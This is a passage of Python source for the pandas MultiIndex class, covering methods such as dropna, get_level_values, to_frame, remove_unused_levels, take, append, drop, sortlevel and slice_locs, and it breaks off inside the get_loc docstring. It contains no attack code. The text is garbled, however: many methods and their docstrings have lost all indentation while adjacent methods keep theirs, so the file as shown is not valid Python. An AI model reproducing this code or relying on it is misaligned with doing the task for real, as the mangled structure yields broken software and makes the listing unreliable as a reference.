            return Index(sort_order).is_monotonic
        except TypeError:
            # we have mixed types and np.lexsort is not happy
            return Index(self._values).is_monotonic
@cache_readonly
def is_monotonic_decreasing(self) -> bool:
"""
return if the index is monotonic decreasing (only equal or
decreasing) values.
"""
# monotonic decreasing if and only if reverse is monotonic increasing
return self[::-1].is_monotonic_increasing
@cache_readonly
def _inferred_type_levels(self) -> list[str]:
"""return a list of the inferred types, one for each level"""
return [i.inferred_type for i in self.levels]
    @doc(Index.duplicated)
    def duplicated(self, keep="first") -> npt.NDArray[np.bool_]:
        # Collapse each row's codes to a single group id, then detect
        # duplicate ids.
        shape = tuple(len(lev) for lev in self.levels)
        ids = get_group_index(self.codes, shape, sort=False, xnull=False)
        return duplicated(ids, keep)
    # error: Cannot override final attribute "_duplicated"
    # (previously declared in base class "IndexOpsMixin")
    _duplicated = duplicated  # type: ignore[misc]
def fillna(self, value=None, downcast=None):
"""
fillna is not implemented for MultiIndex
"""
raise NotImplementedError("isna is not defined for MultiIndex")
    @doc(Index.dropna)
    def dropna(self, how: str = "any") -> MultiIndex:
        # A code of -1 in any level marks a missing value at that position.
        nans = [level_codes == -1 for level_codes in self.codes]
        if how == "any":
            indexer = np.any(nans, axis=0)
        elif how == "all":
            indexer = np.all(nans, axis=0)
        else:
            raise ValueError(f"invalid how option: {how}")
        # Keep only positions that are not flagged, level by level.
        new_codes = [level_codes[~indexer] for level_codes in self.codes]
        return self.set_codes(codes=new_codes)
    def _get_level_values(self, level: int, unique: bool = False) -> Index:
        """
        Return vector of label values for requested level,
        equal to the length of the index

        **this is an internal method**

        Parameters
        ----------
        level : int
        unique : bool, default False
            if True, drop duplicated values

        Returns
        -------
        Index
        """
        lev = self.levels[level]
        level_codes = self.codes[level]
        name = self._names[level]
        if unique:
            # De-duplicate at the code level before materializing values.
            level_codes = algos.unique(level_codes)
        # -1 codes are filled with the level's NA value.
        filled = algos.take_nd(lev._values, level_codes, fill_value=lev._na_value)
        return lev._shallow_copy(filled, name=name)
def get_level_values(self, level):
"""
Return vector of label values for requested level.
Length of returned vector is equal to the length of the index.
Parameters
----------
level : int or str
``level`` is either the integer position of the level in the
MultiIndex, or the name of the level.
Returns
-------
values : Index
Values is a level of this MultiIndex converted to
a single :class:`Index` (or subclass thereof).
Examples
--------
Create a MultiIndex:
>>> mi = pd.MultiIndex.from_arrays((list('abc'), list('def')))
>>> mi.names = ['level_1', 'level_2']
Get level values by supplying level as either integer or name:
>>> mi.get_level_values(0)
Index(['a', 'b', 'c'], dtype='object', name='level_1')
>>> mi.get_level_values('level_2')
Index(['d', 'e', 'f'], dtype='object', name='level_2')
"""
level = self._get_level_number(level)
values = self._get_level_values(level)
return values
@doc(Index.unique)
def unique(self, level=None):
if level is None:
return super().unique()
else:
level = self._get_level_number(level)
return self._get_level_values(level=level, unique=True)
    def to_frame(self, index: bool = True, name=None) -> DataFrame:
        """
        Create a DataFrame with the levels of the MultiIndex as columns.

        Column ordering is determined by the DataFrame constructor with data as
        a dict.

        Parameters
        ----------
        index : bool, default True
            Set the index of the returned DataFrame as the original MultiIndex.
        name : list / sequence of str, optional
            The passed names should substitute index level names.

        Returns
        -------
        DataFrame : a DataFrame containing the original MultiIndex data.

        See Also
        --------
        DataFrame : Two-dimensional, size-mutable, potentially heterogeneous
            tabular data.

        Examples
        --------
        >>> mi = pd.MultiIndex.from_arrays([['a', 'b'], ['c', 'd']])
        >>> mi
        MultiIndex([('a', 'c'),
                    ('b', 'd')],
                   )

        >>> df = mi.to_frame()
        >>> df
             0  1
        a c  a  c
        b d  b  d

        >>> df = mi.to_frame(index=False)
        >>> df
           0  1
        0  a  c
        1  b  d

        >>> df = mi.to_frame(name=['x', 'y'])
        >>> df
             x  y
        a c  a  c
        b d  b  d
        """
        from pandas import DataFrame

        if name is not None:
            if not is_list_like(name):
                raise TypeError("'name' must be a list / sequence of column names.")
            if len(name) != len(self.levels):
                raise ValueError(
                    "'name' should have same length as number of levels on index."
                )
            idx_names = name
        else:
            idx_names = self.names
        # Guarantee resulting column order - PY36+ dict maintains insertion order
        # Unnamed levels fall back to their integer position as column label.
        result = DataFrame(
            {
                (level if lvlname is None else lvlname): self._get_level_values(level)
                for lvlname, level in zip(idx_names, range(len(self.levels)))
            },
            copy=False,
        )
        if index:
            result.index = self
        return result
    def to_flat_index(self) -> Index:
        """
        Convert a MultiIndex to an Index of Tuples containing the level values.

        Returns
        -------
        pd.Index
            Index with the MultiIndex data represented in Tuples.

        See Also
        --------
        MultiIndex.from_tuples : Convert flat index back to MultiIndex.

        Notes
        -----
        This method will simply return the caller if called by anything other
        than a MultiIndex.

        Examples
        --------
        >>> index = pd.MultiIndex.from_product(
        ...     [['foo', 'bar'], ['baz', 'qux']],
        ...     names=['a', 'b'])
        >>> index.to_flat_index()
        Index([('foo', 'baz'), ('foo', 'qux'),
               ('bar', 'baz'), ('bar', 'qux')],
              dtype='object')
        """
        # tupleize_cols=False keeps the tuples as scalar elements instead of
        # re-forming a MultiIndex from them.
        return Index(self._values, tupleize_cols=False)
    @property
    def _is_all_dates(self) -> bool:
        # A MultiIndex is never treated as an all-dates index.
        return False
def is_lexsorted(self) -> bool:
warnings.warn(
"MultiIndex.is_lexsorted is deprecated as a public function, "
"users should use MultiIndex.is_monotonic_increasing instead.",
FutureWarning,
stacklevel=2,
)
return self._is_lexsorted()
    def _is_lexsorted(self) -> bool:
        """
        Return True if the codes are lexicographically sorted.

        Returns
        -------
        bool

        Examples
        --------
        In the below examples, the first level of the MultiIndex is sorted because
        a<b<c, so there is no need to look at the next level.

        >>> pd.MultiIndex.from_arrays([['a', 'b', 'c'], ['d', 'e', 'f']]).is_lexsorted()
        True
        >>> pd.MultiIndex.from_arrays([['a', 'b', 'c'], ['d', 'f', 'e']]).is_lexsorted()
        True

        In case there is a tie, the lexicographical sorting looks
        at the next level of the MultiIndex.

        >>> pd.MultiIndex.from_arrays([[0, 1, 1], ['a', 'b', 'c']]).is_lexsorted()
        True
        >>> pd.MultiIndex.from_arrays([[0, 1, 1], ['a', 'c', 'b']]).is_lexsorted()
        False
        >>> pd.MultiIndex.from_arrays([['a', 'a', 'b', 'b'],
        ...                            ['aa', 'bb', 'aa', 'bb']]).is_lexsorted()
        True
        >>> pd.MultiIndex.from_arrays([['a', 'a', 'b', 'b'],
        ...                            ['bb', 'aa', 'aa', 'bb']]).is_lexsorted()
        False
        """
        # Lexsorted means every level participates in the sort depth.
        return self._lexsort_depth == self.nlevels
@property
def lexsort_depth(self) -> int:
warnings.warn(
"MultiIndex.is_lexsorted is deprecated as a public function, "
"users should use MultiIndex.is_monotonic_increasing instead.",
FutureWarning,
stacklevel=2,
)
return self._lexsort_depth
@cache_readonly
def _lexsort_depth(self) -> int:
"""
Compute and return the lexsort_depth, the number of levels of the
MultiIndex that are sorted lexically
Returns
-------
int
"""
if self.sortorder is not None:
return self.sortorder
return _lexsort_depth(self.codes, self.nlevels)
    def _sort_levels_monotonic(self) -> MultiIndex:
        """
        This is an *internal* function.

        Create a new MultiIndex from the current to monotonically sorted
        items IN the levels. This does not actually make the entire MultiIndex
        monotonic, JUST the levels.

        The resulting MultiIndex will have the same outward
        appearance, meaning the same .values and ordering. It will also
        be .equals() to the original.

        Returns
        -------
        MultiIndex

        Examples
        --------
        >>> mi = pd.MultiIndex(levels=[['a', 'b'], ['bb', 'aa']],
        ...                    codes=[[0, 0, 1, 1], [0, 1, 0, 1]])
        >>> mi
        MultiIndex([('a', 'bb'),
                    ('a', 'aa'),
                    ('b', 'bb'),
                    ('b', 'aa')],
                   )

        >>> mi.sort_values()
        MultiIndex([('a', 'aa'),
                    ('a', 'bb'),
                    ('b', 'aa'),
                    ('b', 'bb')],
                   )
        """
        if self._is_lexsorted() and self.is_monotonic:
            return self
        new_levels = []
        new_codes = []
        for lev, level_codes in zip(self.levels, self.codes):
            if not lev.is_monotonic:
                try:
                    # indexer to reorder the levels
                    indexer = lev.argsort()
                except TypeError:
                    # Unorderable level values: leave this level untouched.
                    pass
                else:
                    lev = lev.take(indexer)
                    # indexer to reorder the level codes
                    indexer = ensure_platform_int(indexer)
                    ri = lib.get_reverse_indexer(indexer, len(indexer))
                    # Remap codes so rows still point at the same values.
                    level_codes = algos.take_nd(ri, level_codes)
            new_levels.append(lev)
            new_codes.append(level_codes)
        return MultiIndex(
            new_levels,
            new_codes,
            names=self.names,
            sortorder=self.sortorder,
            verify_integrity=False,
        )
    def remove_unused_levels(self) -> MultiIndex:
        """
        Create new MultiIndex from current that removes unused levels.

        Unused level(s) means levels that are not expressed in the
        labels. The resulting MultiIndex will have the same outward
        appearance, meaning the same .values and ordering. It will
        also be .equals() to the original.

        Returns
        -------
        MultiIndex

        Examples
        --------
        >>> mi = pd.MultiIndex.from_product([range(2), list('ab')])
        >>> mi
        MultiIndex([(0, 'a'),
                    (0, 'b'),
                    (1, 'a'),
                    (1, 'b')],
                   )

        >>> mi[2:]
        MultiIndex([(1, 'a'),
                    (1, 'b')],
                   )

        The 0 from the first level is not represented
        and can be removed

        >>> mi2 = mi[2:].remove_unused_levels()
        >>> mi2.levels
        FrozenList([[1], ['a', 'b']])
        """
        new_levels = []
        new_codes = []
        changed = False
        for lev, level_codes in zip(self.levels, self.codes):
            # Since few levels are typically unused, bincount() is more
            # efficient than unique() - however it only accepts positive values
            # (and drops order):
            uniques = np.where(np.bincount(level_codes + 1) > 0)[0] - 1
            has_na = int(len(uniques) and (uniques[0] == -1))
            if len(uniques) != len(lev) + has_na:
                if lev.isna().any() and len(uniques) == len(lev):
                    break
                # We have unused levels
                changed = True
                # Recalculate uniques, now preserving order.
                # Can easily be cythonized by exploiting the already existing
                # "uniques" and stop parsing "level_codes" when all items
                # are found:
                uniques = algos.unique(level_codes)
                if has_na:
                    na_idx = np.where(uniques == -1)[0]
                    # Just ensure that -1 is in first position:
                    uniques[[0, na_idx[0]]] = uniques[[na_idx[0], 0]]
                # codes get mapped from uniques to 0:len(uniques)
                # -1 (if present) is mapped to last position
                code_mapping = np.zeros(len(lev) + has_na)
                # ... and reassigned value -1:
                code_mapping[uniques] = np.arange(len(uniques)) - has_na
                level_codes = code_mapping[level_codes]
                # new levels are simple
                lev = lev.take(uniques[has_na:])
            new_levels.append(lev)
            new_codes.append(level_codes)
        result = self.view()
        if changed:
            result._reset_identity()
            result._set_levels(new_levels, validate=False)
            result._set_codes(new_codes, validate=False)
        return result
# --------------------------------------------------------------------
# Pickling Methods
def __reduce__(self):
"""Necessary for making this object picklable"""
d = {
"levels": list(self.levels),
"codes": list(self.codes),
"sortorder": self.sortorder,
"names": list(self.names),
}
return ibase._new_Index, (type(self), d), None
# --------------------------------------------------------------------
    def __getitem__(self, key):
        if is_scalar(key):
            # Scalar position -> a single tuple of level values.
            key = com.cast_scalar_indexer(key, warn_float=True)
            retval = []
            for lev, level_codes in zip(self.levels, self.codes):
                if level_codes[key] == -1:
                    # -1 codes mark missing values.
                    retval.append(np.nan)
                else:
                    retval.append(lev[level_codes[key]])
            return tuple(retval)
        else:
            # in general cannot be sure whether the result will be sorted
            sortorder = None
            if com.is_bool_indexer(key):
                key = np.asarray(key, dtype=bool)
                sortorder = self.sortorder
            elif isinstance(key, slice):
                # A non-reversing slice preserves the existing sort order.
                if key.step is None or key.step > 0:
                    sortorder = self.sortorder
            elif isinstance(key, Index):
                key = np.asarray(key)
            new_codes = [level_codes[key] for level_codes in self.codes]
            return MultiIndex(
                levels=self.levels,
                codes=new_codes,
                names=self.names,
                sortorder=sortorder,
                verify_integrity=False,
            )
def _getitem_slice(self: MultiIndex, slobj: slice) -> MultiIndex:
"""
Fastpath for __getitem__ when we know we have a slice.
"""
sortorder = None
if slobj.step is None or slobj.step > 0:
sortorder = self.sortorder
new_codes = [level_codes[slobj] for level_codes in self.codes]
return type(self)(
levels=self.levels,
codes=new_codes,
names=self._names,
sortorder=sortorder,
verify_integrity=False,
)
@Appender(_index_shared_docs["take"] % _index_doc_kwargs)
def take(
self: MultiIndex,
indices,
axis: int = 0,
allow_fill: bool = True,
fill_value=None,
**kwargs,
) -> MultiIndex:
nv.validate_take((), kwargs)
indices = ensure_platform_int(indices)
# only fill if we are passing a non-None fill_value
allow_fill = self._maybe_disallow_fill(allow_fill, fill_value, indices)
na_value = -1
taken = [lab.take(indices) for lab in self.codes]
if allow_fill:
mask = indices == -1
if mask.any():
masked = []
for new_label in taken:
label_values = new_label
label_values[mask] = na_value
masked.append(np.asarray(label_values))
taken = masked
return MultiIndex(
levels=self.levels, codes=taken, names=self.names, verify_integrity=False
)
    def append(self, other):
        """
        Append a collection of Index options together.
        Parameters
        ----------
        other : Index or list/tuple of indices
        Returns
        -------
        appended : Index
            A MultiIndex when the appended pieces line up level-wise,
            otherwise a flat Index of tuples.
        """
        if not isinstance(other, (list, tuple)):
            other = [other]
        # Fast path: every other index is a MultiIndex with at least as many
        # levels, so we can append level-by-level and rebuild from arrays.
        if all(
            (isinstance(o, MultiIndex) and o.nlevels >= self.nlevels) for o in other
        ):
            arrays = []
            for i in range(self.nlevels):
                label = self._get_level_values(i)
                appended = [o._get_level_values(i) for o in other]
                arrays.append(label.append(appended))
            return MultiIndex.from_arrays(arrays, names=self.names)
        # Fallback: concatenate the materialized tuple values and try to
        # rebuild a MultiIndex; failing that, return a flat tuple Index.
        to_concat = (self._values,) + tuple(k._values for k in other)
        new_tuples = np.concatenate(to_concat)
        # if all(isinstance(x, MultiIndex) for x in other):
        try:
            return MultiIndex.from_tuples(new_tuples, names=self.names)
        except (TypeError, IndexError):
            # new_tuples is not all tuples (or is empty/ragged)
            return Index._with_infer(new_tuples)
def argsort(self, *args, **kwargs) -> npt.NDArray[np.intp]:
return self._values.argsort(*args, **kwargs)
@Appender(_index_shared_docs["repeat"] % _index_doc_kwargs)
def repeat(self, repeats: int, axis=None) -> MultiIndex:
nv.validate_repeat((), {"axis": axis})
# error: Incompatible types in assignment (expression has type "ndarray",
# variable has type "int")
repeats = ensure_platform_int(repeats) # type: ignore[assignment]
return MultiIndex(
levels=self.levels,
codes=[
level_codes.view(np.ndarray).astype(np.intp).repeat(repeats)
for level_codes in self.codes
],
names=self.names,
sortorder=self.sortorder,
verify_integrity=False,
)
    def drop(self, codes, level=None, errors="raise"):
        """
        Make new MultiIndex with passed list of codes deleted.
        Parameters
        ----------
        codes : array-like
            Must be a list of tuples when level is not specified
        level : int or level name, default None
        errors : str, default 'raise'
            If 'ignore', missing labels are skipped instead of raising KeyError.
        Returns
        -------
        dropped : MultiIndex
        """
        if level is not None:
            # Level-wise drop is handled separately.
            return self._drop_from_level(codes, level, errors)
        if not isinstance(codes, (np.ndarray, Index)):
            try:
                codes = com.index_labels_to_array(codes, dtype=np.dtype("object"))
            except ValueError:
                # best-effort conversion; get_loc below will raise if needed
                pass
        inds = []
        for level_codes in codes:
            try:
                loc = self.get_loc(level_codes)
                # get_loc returns either an integer, a slice, or a boolean
                # mask
                if isinstance(loc, int):
                    inds.append(loc)
                elif isinstance(loc, slice):
                    step = loc.step if loc.step is not None else 1
                    inds.extend(range(loc.start, loc.stop, step))
                elif com.is_bool_indexer(loc):
                    if self._lexsort_depth == 0:
                        warnings.warn(
                            "dropping on a non-lexsorted multi-index "
                            "without a level parameter may impact performance.",
                            PerformanceWarning,
                            stacklevel=3,
                        )
                    # Convert the boolean mask to positional indices.
                    loc = loc.nonzero()[0]
                    inds.extend(loc)
                else:
                    msg = f"unsupported indexer of type {type(loc)}"
                    raise AssertionError(msg)
            except KeyError:
                if errors != "ignore":
                    raise
        return self.delete(inds)
    def _drop_from_level(self, codes, level, errors="raise") -> MultiIndex:
        """
        Drop all entries whose code at ``level`` matches any of ``codes``.
        Uses -2 as an internal "not found" sentinel so it cannot collide with
        the -1 NA sentinel used by the codes.
        """
        codes = com.index_labels_to_array(codes)
        i = self._get_level_number(level)
        index = self.levels[i]
        values = index.get_indexer(codes)
        # If nan should be dropped it will equal -1 here. We have to check which values
        # are not nan and equal -1, this means they are missing in the index
        nan_codes = isna(codes)
        values[(np.equal(nan_codes, False)) & (values == -1)] = -2
        if index.shape[0] == self.shape[0]:
            # level has no unused categories, so NA cannot be present either
            values[np.equal(nan_codes, True)] = -2
        not_found = codes[values == -2]
        if len(not_found) != 0 and errors != "ignore":
            raise KeyError(f"labels {not_found} not found in level")
        # Keep rows whose code at this level is NOT among the drop targets.
        mask = ~algos.isin(self.codes[i], values)
        return self[mask]
def swaplevel(self, i=-2, j=-1) -> MultiIndex:
"""
Swap level i with level j.
Calling this method does not change the ordering of the values.
Parameters
----------
i : int, str, default -2
First level of index to be swapped. Can pass level name as string.
Type of parameters can be mixed.
j : int, str, default -1
Second level of index to be swapped. Can pass level name as string.
Type of parameters can be mixed.
Returns
-------
MultiIndex
A new MultiIndex.
See Also
--------
Series.swaplevel : Swap levels i and j in a MultiIndex.
Dataframe.swaplevel : Swap levels i and j in a MultiIndex on a
particular axis.
Examples
--------
>>> mi = pd.MultiIndex(levels=[['a', 'b'], ['bb', 'aa']],
... codes=[[0, 0, 1, 1], [0, 1, 0, 1]])
>>> mi
MultiIndex([('a', 'bb'),
('a', 'aa'),
('b', 'bb'),
('b', 'aa')],
)
>>> mi.swaplevel(0, 1)
MultiIndex([('bb', 'a'),
('aa', 'a'),
('bb', 'b'),
('aa', 'b')],
)
"""
new_levels = list(self.levels)
new_codes = list(self.codes)
new_names = list(self.names)
i = self._get_level_number(i)
j = self._get_level_number(j)
new_levels[i], new_levels[j] = new_levels[j], new_levels[i]
new_codes[i], new_codes[j] = new_codes[j], new_codes[i]
new_names[i], new_names[j] = new_names[j], new_names[i]
return MultiIndex(
levels=new_levels, codes=new_codes, names=new_names, verify_integrity=False
)
def reorder_levels(self, order) -> MultiIndex:
"""
Rearrange levels using input order. May not drop or duplicate levels.
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
Returns
-------
MultiIndex
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([[1, 2], [3, 4]], names=['x', 'y'])
>>> mi
MultiIndex([(1, 3),
(2, 4)],
names=['x', 'y'])
>>> mi.reorder_levels(order=[1, 0])
MultiIndex([(3, 1),
(4, 2)],
names=['y', 'x'])
>>> mi.reorder_levels(order=['y', 'x'])
MultiIndex([(3, 1),
(4, 2)],
names=['y', 'x'])
"""
order = [self._get_level_number(i) for i in order]
if len(order) != self.nlevels:
raise AssertionError(
f"Length of order must be same as number of levels ({self.nlevels}), "
f"got {len(order)}"
)
new_levels = [self.levels[i] for i in order]
new_codes = [self.codes[i] for i in order]
new_names = [self.names[i] for i in order]
return MultiIndex(
levels=new_levels, codes=new_codes, names=new_names, verify_integrity=False
)
def _get_codes_for_sorting(self) -> list[Categorical]:
"""
we are categorizing our codes by using the
available categories (all, not just observed)
excluding any missing ones (-1); this is in preparation
for sorting, where we need to disambiguate that -1 is not
a valid valid
"""
def cats(level_codes):
return np.arange(
np.array(level_codes).max() + 1 if len(level_codes) else 0,
dtype=level_codes.dtype,
)
return [
Categorical.from_codes(level_codes, cats(level_codes), ordered=True)
for level_codes in self.codes
]
    def sortlevel(
        self, level=0, ascending: bool = True, sort_remaining: bool = True
    ) -> tuple[MultiIndex, npt.NDArray[np.intp]]:
        """
        Sort MultiIndex at the requested level.
        The result will respect the original ordering of the associated
        factor at that level.
        Parameters
        ----------
        level : list-like, int or str, default 0
            If a string is given, must be a name of the level.
            If list-like must be names or ints of levels.
        ascending : bool, default True
            False to sort in descending order.
            Can also be a list to specify a directed ordering.
        sort_remaining : sort by the remaining levels after level
        Returns
        -------
        sorted_index : pd.MultiIndex
            Resulting index.
        indexer : np.ndarray[np.intp]
            Indices of output values in original index.
        Examples
        --------
        >>> mi = pd.MultiIndex.from_arrays([[0, 0], [2, 1]])
        >>> mi
        MultiIndex([(0, 2),
                    (0, 1)],
                   )
        >>> mi.sortlevel()
        (MultiIndex([(0, 1),
                    (0, 2)],
                   ), array([1, 0]))
        >>> mi.sortlevel(sort_remaining=False)
        (MultiIndex([(0, 2),
                    (0, 1)],
                   ), array([0, 1]))
        >>> mi.sortlevel(1)
        (MultiIndex([(0, 1),
                    (0, 2)],
                   ), array([1, 0]))
        >>> mi.sortlevel(1, ascending=False)
        (MultiIndex([(0, 2),
                    (0, 1)],
                   ), array([0, 1]))
        """
        if isinstance(level, (str, int)):
            level = [level]
        level = [self._get_level_number(lev) for lev in level]
        sortorder = None
        # we have a directed ordering via ascending
        if isinstance(ascending, list):
            if not len(level) == len(ascending):
                raise ValueError("level must have same length as ascending")
            indexer = lexsort_indexer(
                [self.codes[lev] for lev in level], orders=ascending
            )
        # level ordering
        else:
            codes = list(self.codes)
            shape = list(self.levshape)
            # partition codes and shape
            primary = tuple(codes[lev] for lev in level)
            primshp = tuple(shape[lev] for lev in level)
            # Reverse sorted to retain the order of
            # smaller indices that needs to be removed
            for lev in sorted(level, reverse=True):
                codes.pop(lev)
                shape.pop(lev)
            if sort_remaining:
                # NOTE(review): the primary keys appear twice in the sort key
                # here; with a stable factorized sort this does not change the
                # result, only the work done.
                primary += primary + tuple(codes)
                primshp += primshp + tuple(shape)
            else:
                # only the requested level determines the order
                sortorder = level[0]
            indexer = indexer_from_factorized(primary, primshp, compress=False)
            if not ascending:
                indexer = indexer[::-1]
        indexer = ensure_platform_int(indexer)
        # Reorder every level's codes by the computed permutation.
        new_codes = [level_codes.take(indexer) for level_codes in self.codes]
        new_index = MultiIndex(
            codes=new_codes,
            levels=self.levels,
            names=self.names,
            sortorder=sortorder,
            verify_integrity=False,
        )
        return new_index, indexer
    def _wrap_reindex_result(self, target, indexer, preserve_names: bool):
        """
        Coerce the reindex ``target`` back to a MultiIndex where possible,
        then optionally copy our names onto it.
        """
        if not isinstance(target, MultiIndex):
            if indexer is None:
                # nothing was reindexed; the result is this index itself
                target = self
            elif (indexer >= 0).all():
                # every entry matched, so positions select directly from self
                target = self.take(indexer)
            else:
                try:
                    target = MultiIndex.from_tuples(target)
                except TypeError:
                    # not all tuples, see test_constructor_dict_multiindex_reindex_flat
                    return target
        target = self._maybe_preserve_names(target, preserve_names)
        return target
def _maybe_preserve_names(self, target: Index, preserve_names: bool) -> Index:
if (
preserve_names
and target.nlevels == self.nlevels
and target.names != self.names
):
target = target.copy(deep=False)
target.names = self.names
return target
# --------------------------------------------------------------------
# Indexing Methods
def _check_indexing_error(self, key) -> None:
if not is_hashable(key) or is_iterator(key):
# We allow tuples if they are hashable, whereas other Index
# subclasses require scalar.
# We have to explicitly exclude generators, as these are hashable.
raise InvalidIndexError(key)
@cache_readonly
def _should_fallback_to_positional(self) -> bool:
"""
Should integer key(s) be treated as positional?
"""
# GH#33355
return self.levels[0]._should_fallback_to_positional
    def _get_values_for_loc(self, series: Series, loc, key):
        """
        Do a positional lookup on the given Series, returning either a scalar
        or a Series.
        Assumes that `series.index is self`
        """
        new_values = series._values[loc]
        if is_scalar(loc):
            # single position -> single value
            return new_values
        if len(new_values) == 1 and not self.nlevels > 1:
            # If more than one level left, we can not return a scalar
            return new_values[0]
        # Build the result index from the same positions, dropping the
        # levels that were fully specified by ``key``.
        new_index = self[loc]
        new_index = maybe_droplevels(new_index, key)
        new_ser = series._constructor(new_values, index=new_index, name=series.name)
        # propagate metadata (attrs/flags) from the source series
        return new_ser.__finalize__(series)
    def _get_indexer_strict(
        self, key, axis_name: str
    ) -> tuple[Index, npt.NDArray[np.intp]]:
        """
        Strict indexer lookup; a flat list of scalar (non-tuple) labels is
        matched against level 0 only, anything else defers to the base Index.
        """
        keyarr = key
        if not isinstance(keyarr, Index):
            keyarr = com.asarray_tuplesafe(keyarr)
        if len(keyarr) and not isinstance(keyarr[0], tuple):
            # scalar labels -> optimized level-0 lookup
            indexer = self._get_indexer_level_0(keyarr)
            self._raise_if_missing(key, indexer, axis_name)
            return self[indexer], indexer
        return super()._get_indexer_strict(key, axis_name)
    def _raise_if_missing(self, key, indexer, axis_name: str) -> None:
        """
        Raise KeyError if ``indexer`` shows any requested label was not found.
        Mirrors the level-0 special case taken by ``_get_indexer_strict``.
        """
        keyarr = key
        if not isinstance(key, Index):
            keyarr = com.asarray_tuplesafe(key)
        if len(keyarr) and not isinstance(keyarr[0], tuple):
            # i.e. same condition for special case in MultiIndex._get_indexer_strict
            mask = indexer == -1
            if mask.any():
                # Distinguish "label absent from level 0" from "label present
                # in levels but unused by the index".
                check = self.levels[0].get_indexer(keyarr)
                cmask = check == -1
                if cmask.any():
                    raise KeyError(f"{keyarr[cmask]} not in index")
                # We get here when levels still contain values which are not
                # actually in Index anymore
                raise KeyError(f"{keyarr} not in index")
        else:
            return super()._raise_if_missing(key, indexer, axis_name)
def _get_indexer_level_0(self, target) -> npt.NDArray[np.intp]:
"""
Optimized equivalent to `self.get_level_values(0).get_indexer_for(target)`.
"""
lev = self.levels[0]
codes = self._codes[0]
cat = Categorical.from_codes(codes=codes, categories=lev)
ci = Index(cat)
return ci.get_indexer_for(target)
def get_slice_bound(
self, label: Hashable | Sequence[Hashable], side: str, kind=lib.no_default
) -> int:
"""
For an ordered MultiIndex, compute slice bound
that corresponds to given label.
Returns leftmost (one-past-the-rightmost if `side=='right') position
of given label.
Parameters
----------
label : object or tuple of objects
side : {'left', 'right'}
kind : {'loc', 'getitem', None}
.. deprecated:: 1.4.0
Returns
-------
int
Index of label.
Notes
-----
This method only works if level 0 index of the MultiIndex is lexsorted.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([list('abbc'), list('gefd')])
Get the locations from the leftmost 'b' in the first level
until the end of the multiindex:
>>> mi.get_slice_bound('b', side="left")
1
Like above, but if you get the locations from the rightmost
'b' in the first level and 'f' in the second level:
>>> mi.get_slice_bound(('b','f'), side="right")
3
See Also
--------
MultiIndex.get_loc : Get location for a label or a tuple of labels.
MultiIndex.get_locs : Get location for a label/slice/list/mask or a
sequence of such.
"""
self._deprecated_arg(kind, "kind", "get_slice_bound")
if not isinstance(label, tuple):
label = (label,)
return self._partial_tup_index(label, side=side)
def slice_locs(
self, start=None, end=None, step=None, kind=lib.no_default
) -> tuple[int, int]:
"""
For an ordered MultiIndex, compute the slice locations for input
labels.
The input labels can be tuples representing partial levels, e.g. for a
MultiIndex with 3 levels, you can pass a single value (corresponding to
the first level), or a 1-, 2-, or 3-tuple.
Parameters
----------
start : label or tuple, default None
If None, defaults to the beginning
end : label or tuple
If None, defaults to the end
step : int or None
Slice step
kind : string, optional, defaults None
.. deprecated:: 1.4.0
Returns
-------
(start, end) : (int, int)
Notes
-----
This method only works if the MultiIndex is properly lexsorted. So,
if only the first 2 levels of a 3-level MultiIndex are lexsorted,
you can only pass two levels to ``.slice_locs``.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([list('abbd'), list('deff')],
... names=['A', 'B'])
Get the slice locations from the beginning of 'b' in the first level
until the end of the multiindex:
>>> mi.slice_locs(start='b')
(1, 4)
Like above, but stop at the end of 'b' in the first level and 'f' in
the second level:
>>> mi.slice_locs(start='b', end=('b', 'f'))
(1, 3)
See Also
--------
MultiIndex.get_loc : Get location for a label or a tuple of labels.
MultiIndex.get_locs : Get location for a label/slice/list/mask or a
sequence of such.
"""
self._deprecated_arg(kind, "kind", "slice_locs")
# This function adds nothing to its parent implementation (the magic
# happens in get_slice_bound method), but it adds meaningful doc.
return super().slice_locs(start, end, step)
    def _partial_tup_index(self, tup: tuple, side="left"):
        """
        Compute the slice bound for a (possibly partial) key tuple by
        narrowing a [start, end) window one level at a time.
        Requires the index to be lexsorted at least to len(tup) levels.
        """
        if len(tup) > self._lexsort_depth:
            raise UnsortedIndexError(
                f"Key length ({len(tup)}) was greater than MultiIndex lexsort depth "
                f"({self._lexsort_depth})"
            )
        n = len(tup)
        start, end = 0, len(self)
        zipped = zip(tup, self.levels, self.codes)
        for k, (lab, lev, level_codes) in enumerate(zipped):
            # only search within the window established by outer levels
            section = level_codes[start:end]
            if lab not in lev and not isna(lab):
                # short circuit
                try:
                    loc = lev.searchsorted(lab, side=side)
                except TypeError as err:
                    # non-comparable e.g. test_slice_locs_with_type_mismatch
                    raise TypeError(f"Level type mismatch: {lab}") from err
                if not is_integer(loc):
                    # non-comparable level, e.g. test_groupby_example
                    raise TypeError(f"Level type mismatch: {lab}")
                if side == "right" and loc >= 0:
                    # label absent: the right bound sits before its insertion point
                    loc -= 1
                return start + section.searchsorted(loc, side=side)
            idx = self._get_loc_single_level_index(lev, lab)
            if isinstance(idx, slice) and k < n - 1:
                # Get start and end value from slice, necessary when a non-integer
                # interval is given as input GH#37707
                start = idx.start
                end = idx.stop
            elif k < n - 1:
                # tighten the window around the matched code for this level
                end = start + section.searchsorted(idx, side="right")
                start = start + section.searchsorted(idx, side="left")
            elif isinstance(idx, slice):
                idx = idx.start
                return start + section.searchsorted(idx, side=side)
            else:
                # last level: resolve the final bound within the window
                return start + section.searchsorted(idx, side=side)
def _get_loc_single_level_index(self, level_index: Index, key: Hashable) -> int:
"""
If key is NA value, location of index unify as -1.
Parameters
----------
level_index: Index
key : label
Returns
-------
loc : int
If key is NA value, loc is -1
Else, location of key in index.
See Also
--------
Index.get_loc : The get_loc method for (single-level) index.
"""
if is_scalar(key) and isna(key):
return -1
else:
return level_index.get_loc(key)
    def get_loc(self, key, method=None):
        """
        Get location for a label or a tuple of labels.
        The location is returned as an integer/slice or boolean
        mask.
        Parameters
        ----------
        key : label or tuple of labels (one for each level)
        method : None
        Returns
        -------
        loc : int, slice object or boolean mask
            If the key is past the lexsort depth, the return may be a
            boolean mask array, otherwise it is always a slice or int.
        See Also
        --------
        Index.get_loc : The get_loc method for (single-level) index.
        MultiIndex.slice_locs : Get slice location given start label(s) and
            end label(s).
        MultiIndex.get_locs : Get location for a label/slice/list/mask or a
            sequence of such.
        Notes
        -----
